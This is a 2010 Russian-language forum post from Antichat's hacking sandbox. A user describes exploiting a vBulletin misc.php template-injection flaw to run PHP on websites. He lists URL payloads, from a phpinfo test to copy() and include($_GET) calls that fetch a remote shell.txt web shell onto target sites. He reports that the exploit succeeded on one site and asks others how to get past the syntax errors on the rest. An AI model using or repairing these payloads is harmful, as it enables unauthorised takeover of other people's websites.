HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.09.2010, 15:11
FlooP1k
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами: 8311286

Репутация: 48
По умолчанию

Вобщем пользовался уязвимостью для вбулки для выполнения пхп команд на сайте, вот он:

/misc.php?do=page&template={${phpinfo}}

Пхпинфо конечно же отлично работает я решил попробывать функцию copy:

/misc.php?do=page&template={${copy('http://sait/shell.txt','s.php');}}

Но выдало ошибкуarse error: syntax error, unexpected '%', expecting ')' in

Я потом попробывал Get:

/misc.php?do=page&template={${include($_GET[aa]);&aa=http://mypet-style.ru/backup/1/shell.txt}}

И получил ошибкуarse error: syntax error, unexpected ';' in ...

Как это обойти, да и что он от меня вобще хочет? Убераю точку с запятой в запросе, тогда ему не нравиться знак ровно.

Вобщем на одном сайте только получилось с GET а на всех остальных syntax error ...

Посоветуйте что нибудь?
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.